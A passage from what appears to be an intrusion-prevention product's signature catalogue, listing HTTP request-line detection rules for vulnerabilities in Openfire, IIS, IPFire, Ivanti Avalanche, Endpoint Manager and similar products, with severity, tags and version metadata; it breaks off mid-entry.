Context: HTTP Normalized Request-Line
Severity: 10
Tags: Any Operating System, Any Hardware, Ignite Realtime Openfire, CVE2015, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-688-5211
Last changed: sgpkg-ips-1014-5242
Vulnerability: Ignite-Realtime-OpenFire-Group-summary.jsp-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-Ignite-Realtime-OpenFire-Server-XSS

About this situation: An attempt to exploit a vulnerability in Ignite Realtime Openfire detected
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Any Operating System, Any Hardware, Ignite Realtime Openfire, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-686-5211
Last changed: sgpkg-ips-1014-5242
Vulnerability: Ignite-Realtime-OpenFire-Server-XSS
Description:
Back to top

HTTP_CRL-Ignite-Realtime-OpenFire-Version-3.7.1-Reflected-XSS

About this situation: An attempt to exploit a vulnerability in Ignite Realtime Openfire Version 3.7.1 detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Ignite Realtime Openfire, CVE2018, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1867-5242
Last changed: sgpkg-ips-1867-5242
Vulnerability: Ignite-Realtime-OpenFire-Version-3.7.1-Reflected-XSS
Description:
Back to top

HTTP_CRL-IIS-Exair-DoS

About this situation: IIS ExAir sample page Denial of Service
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, IIS 4.0, CVE1999, Windows not specific, Denial of Service, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-7-1102
Last changed: sgpkg-ips-350-4219
Vulnerability: HTTP_IIS-Exair-DoS
Description:
Back to top

HTTP_CRL-IIS-Isapi-Htr-BOF

About this situation: IIS Isapi Htr BOF
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, IIS, MS2002, CVE2002, Windows not specific, IIS not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-167-2032
Last changed: sgpkg-ips-1405-5242
Vulnerability: HTTP-IIS-Isapi-Htr-Buffer-Overflow
Description:
Back to top

HTTP_CRL-IIS-Isapi-Windows-Media-Services-BOF-3

About this situation: Detects buffer overflow exploits against IIS Isapi Extension for Windows Media Services
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, IIS, Windows Media Services, MS2003, CVE2003, Windows not specific, IIS not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-155-2032
Last changed: sgpkg-ips-1607-5242
Vulnerability: IIS-Isapi-Windows-Media-Services-BOF-MS03-019
Description:
Back to top

HTTP_CRL-IIS-WebHitsfile-Access

About this situation: IIS WebHitsfile file disclosure
Context: HTTP Normalized Request-Line
Severity: 2
Tags: Windows, Any Hardware, IIS, CVE2007, Windows not specific, IIS not specific, Potential Disclosure, TCP Client Traffic
First detected in: sgpkg-ips-168-2032
Last changed: sgpkg-ips-168-2032
Vulnerability: HTTP-IIS-Hit-Highlighting-Authentication-Bypass
Description:
Back to top

HTTP_CRL-Iisprotect-SQL-Injection-CVE-2003-0377

About this situation: An attempt to exploit a vulnerability in iisPROTECT detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-684-5211
Last changed: sgpkg-ips-684-5211
Description:
Back to top

HTTP_CRL-IkonBoard-Multiple-Vulnerabilities

About this situation: An attempt to exploit a vulnerability in IkonBoard detected
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-684-5211
Last changed: sgpkg-ips-1013-5242
Description:
Back to top

HTTP_CRL-Imperva-SecureSphere-Pws-Command-Injection

About this situation: An attempt to exploit a vulnerability in Imperva SecureSphere detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Imperva SecureSphere, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1158-5242
Last changed: sgpkg-ips-1379-5242
Vulnerability: Imperva-SecureSphere-Pws-Command-Injection
Description:
Back to top

HTTP_CRL-Index-Request-Type

About this situation: A non-standard HTTP-request detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Generic HTTP server, Any Operating System not specific, Generic HTTP server not specific, Suspected Disclosure, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-617-5211
Last changed: sgpkg-ips-617-5211
Vulnerability: Index-Request-Type
Description:
Back to top

HTTP_CRL-Inductive-Automation-Ignition-Project-Deserialization

About this situation: An attempt to exploit a vulnerability in Inductive Automation Ignition detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Inductive Automation Ignition, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1267-5242
Last changed: sgpkg-ips-1405-5242
Vulnerability: Inductive-Automation-Ignition-Project-Deserialization
Description:
Back to top

HTTP_CRL-InformationSchema-Query

About this situation: Possible SQL injection detected
Context: HTTP Normalized Request-Line
Severity: 1
Tags: Any Operating System, Any Hardware, MySQL, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-441-4219
Last changed: sgpkg-ips-867-5242
Vulnerability: SQL-Injection
Description:
Back to top

HTTP_CRL-INL-ulog-SQL-Injection

About this situation: An attempt to exploit a vulnerability in INL ulog-php detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-684-5211
Last changed: sgpkg-ips-684-5211
Description:
Back to top

HTTP_CRL-IntegraXOR-SQL-Injection

About this situation: An attempt to exploit a vulnerability in IntegraXOR detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, IntegraXOR, Any Operating System not specific, Suspected Disclosure, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-609-5211
Last changed: sgpkg-ips-1272-5242
Vulnerability: IntegraXOR-SQL-Injection
Description:
Back to top

HTTP_CRL-Intelbras-Wifiber-120AC-inMesh-Command-Injection-CVE-2022-40005

About this situation: An attempt to exploit a vulnerability in Intelbras WiFiber detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Intelbras WiFiber, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1606-5242
Last changed: sgpkg-ips-1606-5242
Vulnerability: Intelbras-Wifiber-120AC-inMesh-Command-Injection-CVE-2022-40005
Description:
Back to top

HTTP_CRL-Invisionix-IRSR

About this situation: An attempt to exploit a vulnerability in Invisionix Roaming System Remote
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Invisionix, CVE2006, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-786-5211
Last changed: sgpkg-ips-786-5211
Vulnerability: Invisionix-IRSR-Remote-PHP-Inclusion
Description:
Back to top

HTTP_CRL-IPFire-Firewall-Web-Interface-Backup-Cgi-Command-Injection

About this situation: An attempt to exploit a vulnerability in IPFire Team IPFire detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, IPFire, CVE2018, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1120-5242
Last changed: sgpkg-ips-1120-5242
Vulnerability: IPFire-Firewall-Web-Interface-Backup-Cgi-Command-Injection
Description:
Back to top

HTTP_CRL-IPFire-Pakfire.cgi-Authenticated-RCE

About this situation: An attempt to exploit a vulnerability in IPFire detected.
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, IPFire, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1365-5242
Last changed: sgpkg-ips-1365-5242
Vulnerability: IPFire-Pakfire.cgi-Authenticated-RCE
Description:
Back to top

HTTP_CRL-IPFire-Proxy.cgi-RCE

About this situation: An IPFire proxy.cgi RCE vulnerability
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Linux, Any Hardware, IPFire, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1020-5242
Last changed: sgpkg-ips-1343-5242
Vulnerability: IPFire-Proxy.cgi-RCE
Description:
Back to top

HTTP_CRL-IPFire-Proxy.cgi-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in IPFire detected
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Any Operating System, Any Hardware, IPFire, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-809-5242
Last changed: sgpkg-ips-1013-5242
Vulnerability: IPFire-Proxy.cgi-Remote-Code-Execution
Description:
Back to top

HTTP_CRL-Iplanet-Web-Admin-Server-Command-Execution

About this situation: iPlanet Web Admin Server remote command execution
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Unix, Any Hardware, iPlanet, CVE2002, Unix not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-176-2032
Last changed: sgpkg-ips-182-2032
Vulnerability: Sun-Iplanet-Admin-Server-XSS
Description:
Back to top

HTTP_CRL-Ipswitch-WhatsUp-Maincfgret-Buffer-Overflow

About this situation: Detects exploits agaisnt vulnerability in Ipswitch WhatsUp aplication
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Windows, Any Hardware, Ipswitch WhatsUp Gold, CVE2004, Windows not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-113-2032
Last changed: sgpkg-ips-370-4219
Vulnerability: HTTP-Ipswitch-WhatsUp-Maincfgret-Buffer-Overflow
Description:
Back to top

HTTP_CRL-Ipswitch-WhatsUp-Web-Interface-SQL-Injection

About this situation: SQL injection attempt against Ipswitch WhatsUp Professional
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, x86, WhatsUp Professional, CVE2005, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-64-1210
Last changed: sgpkg-ips-159-2032
Vulnerability: HTTP-Ipswitch-WhatsUp-Web-Interface-SQL-Injection
Description:
Back to top

HTTP_CRL-Isapi-Extension-Buffer-Overflow-Attack

About this situation: IIS Isapi extension buffer overflow
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Windows 2000 SP0, Windows 2000 SP1, Windows 2000 SP2, Any Hardware, IIS 5.0, IIS 4.0, MS2001, CVE2001, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-148-2032
Vulnerability: HTTP-Isapi-Extension-Buffer-Overflow
Description:
Back to top

HTTP_CRL-ISPConfig-User_settings.php-Arbitrary-File-Inclusion

About this situation: An attempt to exploit a vulnerability in ISPConfig detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, ISPConfig, CVE2018, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1110-5242
Last changed: sgpkg-ips-1110-5242
Vulnerability: ISPConfig-User_settings.php-Arbitrary-File-Inclusion
Description:
Back to top

HTTP_CRL-itok-Token-SQL-Injection

About this situation: An attempt to exploit an itok Token SQL Injection vulnerability
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1027-5242
Last changed: sgpkg-ips-1422-5242
Vulnerability: itok-Token-SQL-Injection
Description:
Back to top

HTTP_CRL-ITS-SCADA-SQL-Injection

About this situation: An attempt to exploit a vulnerability in ITS SCADA detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, ITS SCADA, Any Operating System not specific, Disclosure, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-609-5211
Last changed: sgpkg-ips-926-5242
Vulnerability: ITS-SCADA-SQL-Injection
Description:
Back to top

HTTP_CRL-Ivanti-Avalanche-Copyfile-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Ivanti Avalanche detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Ivanti Avalanche, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1742-5242
Last changed: sgpkg-ips-1748-5242
Vulnerability: Ivanti-Avalanche-Copyfile-Directory-Traversal
Description:
Back to top

HTTP_CRL-Ivanti-Avalanche-Enterprise-Service-Central-Filestore-Arbitrary-File-Upload

About this situation: An attempt to exploit a vulnerability in Ivanti Avalanche detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Ivanti Avalanche, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1426-5242
Last changed: sgpkg-ips-1702-5242
Vulnerability: Ivanti-Avalanche-Enterprise-Service-Central-Filestore-Arbitrary-File-Upload
Description:
Back to top

HTTP_CRL-Ivanti-Avalanche-Enterprise-Service-Central-Filestore-Mapshare-Command-Injection

About this situation: An attempt to exploit a vulnerability in Ivanti Avalanche detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Ivanti Avalanche, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1425-5242
Last changed: sgpkg-ips-1590-5242
Vulnerability: Ivanti-Avalanche-Enterprise-Service-Central-Filestore-Mapshare-Command-Injection
Description:
Back to top

HTTP_CRL-Ivanti-Avalanche-Filestoreconfig-CVE-2023-32564-Arbitrary-File-Upload

About this situation: An attempt to exploit a vulnerability in Ivanti Avalanche detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Ivanti Avalanche, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1626-5242
Last changed: sgpkg-ips-1677-5242
Vulnerability: Ivanti-Avalanche-Filestoreconfig-CVE-2023-32564-Arbitrary-File-Upload
Description:
Back to top

HTTP_CRL-Ivanti-Avalanche-Filestoreconfig-CVE-2023-46263-Arbitrary-File-Upload

About this situation: An attempt to exploit a vulnerability in Ivanti Avalanche detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Ivanti Avalanche, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1677-5242
Last changed: sgpkg-ips-1702-5242
Vulnerability: Ivanti-Avalanche-Filestoreconfig-CVE-2023-46263-Arbitrary-File-Upload
Description:
Back to top

HTTP_CRL-Ivanti-Avalanche-Filestoreconfig-CVE-2024-29848-Arbitrary-File-Upload

About this situation: An attempt to exploit a vulnerability in Ivanti Avalanche detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, Ivanti Avalanche, CVE2024, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1746-5242
Last changed: sgpkg-ips-1746-5242
Vulnerability: Ivanti-Avalanche-Filestoreconfig-CVE-2024-29848-Arbitrary-File-Upload
Description:
Back to top

HTTP_CRL-Ivanti-Avalanche-Filestoreconfig-Validatefilestoreuncpath-Arbitrary-File-Upload

About this situation: An attempt to exploit a vulnerability in Ivanti Avalanche detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Ivanti Avalanche, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1627-5242
Last changed: sgpkg-ips-1702-5242
Vulnerability: Ivanti-Avalanche-Filestoreconfig-Validatefilestoreuncpath-Arbitrary-File-Upload
Description:
Back to top

HTTP_CRL-Ivanti-Avalanche-Getadhocfilepath-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Ivanti Avalanche detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Ivanti Avalanche, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1729-5242
Last changed: sgpkg-ips-1774-5242
Vulnerability: Ivanti-Avalanche-Getadhocfilepath-Directory-Traversal
Description:
Back to top

HTTP_CRL-Ivanti-Avalanche-Path-Traversal-CVE-2023-41474

About this situation: An attempt to exploit a vulnerability in Ivanti Avalanche detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Ivanti Avalanche, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1686-5242
Last changed: sgpkg-ips-1774-5242
Vulnerability: Ivanti-Avalanche-Path-Traversal-CVE-2023-41474
Description:
Back to top

HTTP_CRL-Ivanti-Avalanche-Remote-Control-Server-Deleteskin-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Ivanti Avalanche detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Ivanti Avalanche, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1772-5242
Last changed: sgpkg-ips-1772-5242
Vulnerability: Ivanti-Avalanche-Remote-Control-Server-Deleteskin-Directory-Traversal
Description:
Back to top

HTTP_CRL-Ivanti-Avalanche-Remote-Control-Server-Setproperty-Authentication-Bypass

About this situation: An attempt to exploit a vulnerability in Ivanti Avalanche detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Ivanti Avalanche, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1573-5242
Last changed: sgpkg-ips-1573-5242
Vulnerability: Ivanti-Avalanche-Remote-Control-Server-Setproperty-Authentication-Bypass
Description:
Back to top

HTTP_CRL-Ivanti-Avalanche-Remote-Control-Server-Validateamcwsconnection-Server-Side-Request-Forgery

About this situation: An attempt to exploit a vulnerability in Ivanti Avalanche detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Ivanti Avalanche, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1676-5242
Last changed: sgpkg-ips-1754-5242
Vulnerability: Ivanti-Avalanche-Remote-Control-Server-Validateamcwsconnection
Description:
Back to top

HTTP_CRL-Ivanti-Avalanche-Securefilter-Allowpassthrough-Authentication-Bypass

About this situation: An attempt to exploit a vulnerability in Ivanti Avalanche detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Ivanti Avalanche, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1697-5242
Last changed: sgpkg-ips-1697-5242
Vulnerability: Ivanti-Avalanche-Securefilter-Allowpassthrough-Authentication-Bypass
Description:
Back to top

HTTP_CRL-Ivanti-Avalanche-Validateamcwsconnection-CVE-2024-47008-Server-Side-Request-Forgery

About this situation: An attempt to exploit a vulnerability in Ivanti Avalanche
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Ivanti Avalanche, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1834-5242
Last changed: sgpkg-ips-1857-5242
Vulnerability: Ivanti-Avalanche-Validateamcwsconnection-Server-Side-Request-Forgery
Description:
Back to top

HTTP_CRL-Ivanti-Cloud-Services-Appliance-Command-Injection-CVE-2024-8190

About this situation: An attempt to exploit a vulnerability in Ivanti Cloud Services Appliance detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Ivanti Cloud Services Appliance, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1781-5242
Last changed: sgpkg-ips-1781-5242
Vulnerability: Ivanti-Cloud-Services-Appliance-Command-Injection-CVE-2024-8190
Description:
Back to top

HTTP_CRL-Ivanti-Cloud-Services-Appliance-Command-Injection-CVE-2024-9380

About this situation: An attempt to exploit a vulnerability in Ivanti Cloud Services Appliance detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Ivanti Cloud Services Appliance, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1793-5242
Last changed: sgpkg-ips-1798-5242
Vulnerability: Ivanti-Cloud-Services-Appliance-Command-Injection-CVE-2024-9380
Description:
Back to top

HTTP_CRL-Ivanti-Cloud-Services-Appliance-Setbrokerconfigvalue-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Ivanti Cloud Service Appliance detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Ivanti Cloud Services Appliance, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1796-5242
Last changed: sgpkg-ips-1796-5242
Vulnerability: Ivanti-Cloud-Services-Appliance-Setbrokerconfigvalue-SQL-Injection
Description:
Back to top

HTTP_CRL-Ivanti-Connect-Secure-And-Policy-Secure-OpenSSL-Crlf-Injection

About this situation: An attempt to exploit a vulnerability in Ivanti Connect Secure (ICS) detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Ivanti Connect Secure, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1803-5242
Last changed: sgpkg-ips-1803-5242
Vulnerability: Ivanti-Connect-Secure-And-Policy-Secure-OpenSSL-Crlf-Injection
Description:
Back to top

HTTP_CRL-Ivanti-Connect-Secure-Authenticated-Crlf-Injection-CVE-2024-37404

About this situation: An attempt to exploit a vulnerability in Ivanti Connect Secure detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Ivanti Connect Secure, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1819-5242
Last changed: sgpkg-ips-1820-5242
Vulnerability: Ivanti-Connect-Secure-Authenticated-Crlf-Injection-CVE-2024-37404
Description:
Back to top

HTTP_CRL-Ivanti-CSA-Removecorecertificate-SQL-Injection-CVE-2024-11773

About this situation: An attempt to exploit a vulnerability in Ivanti Cloud Services Appliance detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Ivanti Cloud Services Appliance, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1832-5242
Last changed: sgpkg-ips-1832-5242
Vulnerability: Ivanti-CSA-Removecorecertificate-SQL-Injection-CVE-2024-11773
Description:
Back to top

HTTP_CRL-Ivanti-Endpoint-Manager-Credential-Coercion-Through-WSVulnerabilityCore

About this situation: An attempt to exploit a vulnerability in Ivanti Endpoint Manager detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Ivanti Endpoint Manager, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1840-5242
Last changed: sgpkg-ips-1840-5242
Vulnerability: Ivanti-Endpoint-Manager-Credential-Coercion-CVE-2024-13159
Ivanti-Endpoint-Manager-Credential-Coercion-CVE-2024-13160
Ivanti-Endpoint-Manager-Credential-Coercion-CVE-2024-13161
Ivanti-Endpoint-Manager-Credential-Coercion-CVE-2024-10811
Description:
Back to top

HTTP_CRL-Ivanti-Endpoint-Manager-DPIDatabase-GetComputerID-SQL-Injection-CVE-2024-50330

About this situation: An attempt to exploit a vulnerability in Ivanti Endpoint Manager detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Ivanti Endpoint Manager, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1853-5242
Last changed: sgpkg-ips-1853-5242
Vulnerability: Ivanti-Endpoint-Manager-DPIDatabase-GetComputerID-SQL-Injection-CVE-2024-50330
Description:
Back to top

HTTP_CRL-Ivanti-Endpoint-Manager-ECustomDataForm-OnSaveToDB-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Ivanti Endpoint Manager detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Ivanti Endpoint Manager, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1858-5242
Last changed: sgpkg-ips-1858-5242
Vulnerability: Ivanti-Endpoint-Manager-ECustomDataForm-OnSaveToDB-Directory-Traversal
Description:
Back to top

HTTP_CRL-Ivanti-Endpoint-Manager-Getlogfilerulesnameuniquesql-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Ivanti Endpoint Manager detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Ivanti Endpoint Manager, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1770-5242
Last changed: sgpkg-ips-1770-5242
Vulnerability: Ivanti-Endpoint-Manager-Getlogfilerulesnameuniquesql-SQL-Injection
Description:
Back to top

HTTP_CRL-Ivanti-Endpoint-Manager-Getsqlstatement-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Ivanti Endpoint Manager detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Ivanti Endpoint Manager, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1793-5242
Last changed: sgpkg-ips-1793-5242
Vulnerability: Ivanti-Endpoint-Manager-Getsqlstatement-SQL-Injection
Description:
Back to top

HTTP_CRL-Ivanti-Endpoint-Manager-MP_QueryDetail-SQL-Injection-CVE-2024-34781

About this situation: An attempt to exploit a vulnerability in Ivanti Endpoint Manager detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Ivanti Endpoint Manager, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1865-5242
Last changed: sgpkg-ips-1865-5242
Vulnerability: Ivanti-Endpoint-Manager-MP_QueryDetail-SQL-Injection-CVE-2024-34781
Description:
Back to top

HTTP_CRL-Ivanti-Endpoint-Manager-Serverasset-Updateassetinfo-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Ivanti Endpoint Manager detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Ivanti Endpoint Manager, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
